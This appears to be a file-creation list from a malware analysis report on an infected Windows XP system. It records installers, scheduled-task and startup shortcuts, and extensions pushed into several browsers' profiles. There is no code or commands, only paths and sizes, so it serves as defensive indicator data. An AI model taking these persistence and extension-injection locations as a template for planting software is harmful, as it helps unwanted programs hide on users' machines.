    %Documents and Settings%\%current user%\Cookies\[email protected][2].txt (400 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@bing[1].txt (1348 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][2].txt (400 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (332 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\rmsloaderdelayeddiv[2].js (549 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\search[1].htm (540 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@msn[1].txt (694 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (5820 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\ips1388[1].htm (388 bytes)
    %Documents and Settings%\%current user%\Local Settings\AlmDay\config\Assist\cybercafe.conf (624 bytes)
    %Documents and Settings%\%current user%\Local Settings\AlmDay\config\Assist\mnconf.conf (2 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (207 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\Passport[1].htm (436 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (194 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\iplookup[1].htm (153 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\rmsloaderdelayeddiv[1].js (205 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@bing[2].txt (1730 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\WindowsLiveConnect_c[1].js (280 bytes)
    %WinDir%\Tasks\AssistantUpdateTask_adm.job (428 bytes)
    %Program Files%\FM4.0\201409180317\avcodec-54.dll (23424 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\FM4.0\FM4.0.lnk (787 bytes)
    %Program Files%\FM4.0\201409180317\channels.xml (784 bytes)
    %Program Files%\FM4.0\201409180317\Data\dh.ini (56 bytes)
    %Program Files%\FM4.0\201409180317\FHSev.exe (11048 bytes)
    %Program Files%\FM4.0\201409180317\libav.dll (6360 bytes)
    %Program Files%\FM4.0\201409180317\source.dll (6584 bytes)
    %Program Files%\FM4.0\201409180317\swresample-0.dll (3312 bytes)
    %Program Files%\FM4.0\201409180317\pthreadGC2.dll (3616 bytes)
    %Program Files%\FM4.0\201409180317\favorfm.xml (440 bytes)
    %Program Files%\FM4.0\201409180317\DuiLib.dll (16288 bytes)
    %Program Files%\FM4.0\201409180317\fm4svr.exe (23424 bytes)
    %Program Files%\FM4.0\201409180317\avformat-54.dll (12088 bytes)
    %Program Files%\FM4.0\201409180317\Data\version.ini (32 bytes)
    %Program Files%\FM4.0\201409180317\Unins.exe (9608 bytes)
    %Program Files%\FM4.0\201409180317\fm4.exe (63950 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\FM4.0\ÅäÖù¤¾ß\жÔØFM4.0.lnk (813 bytes)
    %Program Files%\FM4.0\201409180317\avcore.dll (2392 bytes)
    %Program Files%\FM4.0\201409180317\Data\setup.ini (124 bytes)
    %Program Files%\FM4.0\201409180317\audio.dll (3616 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\FM4.0\¹Ù·½Ö÷Ò³.lnk (334 bytes)
    %Program Files%\FM4.0\201409180317\avutil-52.dll (5520 bytes)
    %Program Files%\fjwyusp\hzsoft\UUSEE_kb1003_Setup_133149.exe (721630 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\UUSEE_kb1003_Setup_133149[1].exe (783977 bytes)
    %Program Files%\fjwyusp\hzsoft\setup_2949-14598.exe (689706 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\setup_2949-14598[1].exe (752556 bytes)
    %Program Files%\fjwyusp\fjwyusp.exe (23610 bytes)
    %Program Files%\fjwyusp\rnr20.dll (3 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktopData\UserData\AppleConfig.ini (527 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktopData\UserData\AppleData.add.bk (16 bytes)
    %Documents and Settings%\%current user%\Application Data\AppleDesktopData\UserData\AppleData.add.write_cache (16 bytes)
    %Program Files%\FM4.0\201409180317\Data\0317.Tmp (1268 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\Update[1].rar (2052 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\fwtj[1].htm (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\AlmDay\config\Driver\Dragon.dat (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\AlmDay\config\config.ini (46 bytes)
    %Documents and Settings%\%current user%\Local Settings\AlmDay\config\Assist\data.dat (388 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-JV8SK.tmp\_isetup\_RegDLL.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-JV8SK.tmp\Tool.dll (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-JV8SK.tmp\ISTask.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-JV8SK.tmp\_isetup\_shfoldr.dll (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\focus-img-button-png8[1].png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\1409112564312005[1].jpg (64625 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\jstmbase[1].css (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\wz-main-bg[1].jpg (33202 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\jquery.base64[1].js (2365 bytes)
    %Documents and Settings%\All Users\Start Menu\¢ñnetert Hao¢ñ23.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\jquery.cookie.1.3.1[1].js (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\jstmbase[2].css (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\home-page-png8[1].png (8745 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\¢ñnetert Hao¢ñ23.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\home-page[1].png (30010 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\jquery-1.10.2.min[1].js (58245 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\1389683374154825[1].gif (2553 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\1389682959213947[1].gif (2553 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startup\绝色唐门.lnk (611 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\1409210600946002[1].jpg (65433 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\1389683394108438[1].gif (2553 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\1389683211750106[1].gif (4473 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\is_Desktop[1].htm (1666 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\jquery.slide[1].js (993 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\1389683070249849[1].gif (4014 bytes)
    %Documents and Settings%\All Users\Desktop\¢ñnetert Hao¢ñ23.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\1406784233525194[1].jpg (77561 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\1.1.0.0a-zm-157391-v5[1].htm (930 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\sjss\sjss.exe (1837 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\sjss\image\2.png (13 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\速捷搜索\速捷搜索.lnk (693 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\速捷搜索.lnk (1428 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\sjss\Config.ini (48 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\sjss\uninstall.exe (267 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\速捷搜索.lnk (685 bytes)
    %Documents and Settings%\All Users\Desktop\速捷搜索.lnk (681 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\sjss\SouSuo.zip (29 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\sjss\image\3.png (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\sjss\image\0.png (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\sjss\image\1.png (6 bytes)
    %Documents and Settings%\All Users\Start Menu\速捷搜索.lnk (681 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\sjss\install_1410999409.tmp (301 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\速捷搜索\卸载速捷搜索.lnk (912 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (601 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (601 bytes)
    %Program Files%\jstm\ptc (9 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\绝色唐门\卸载.lnk (599 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Preferences (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ext.7z (106408 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Almanac_clnh_2014.8.3._126cl.exe (1947589 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Preferences (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Preferences (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\G0623_s_80314.exe (19594639 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
    %Program Files%\jstm\install_1410999454.tmp (6319 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ptc (9 bytes)
    %Program Files%\jstm\juese.exe (12289 bytes)
    %Documents and Settings%\All Users\Desktop\绝色唐门.lnk (587 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\Almanac_clnh_2014.8.3._126cl[1].exe (1947589 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\OfficeAssist.0195.80.1015.exe (2265057 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (601 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\ext[1].7z (106408 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\OfficeAssist.0195.80.1015[1].exe (2265057 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\F0916_s_30897[1].exe (9843602 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (601 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\G0623_s_80314[1].exe (19594639 bytes)
    %Program Files%\jstm\unist.exe (1624 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Preferences (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
    %Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (94 bytes)
